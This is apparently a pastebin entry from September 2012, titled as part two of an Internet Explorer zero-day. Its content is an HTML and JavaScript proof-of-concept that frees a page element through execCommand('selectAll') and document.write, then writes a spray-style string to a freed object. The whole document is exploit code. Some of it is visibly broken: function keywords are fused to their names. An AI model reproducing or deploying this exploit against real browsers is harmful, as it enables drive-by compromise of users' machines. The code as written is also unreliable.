
Part two of the September IE 0-day
By:
elreg_cw on
Sep 18th, 2012 | syntax:
HTML | size: 0.33 KB | hits: 1,100 | expires: Never
<html>
<script>
functionfuncB() {
document.execCommand("selectAll");
};
functionfuncA() {
document.write("L");
parent.arrr[0].src="YMjf\\u0c08\\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH";
}
</script>
<body onload='funcB();' onselect='funcA()'>
<div contenteditable='true'>
a
</div>
</body>
</html>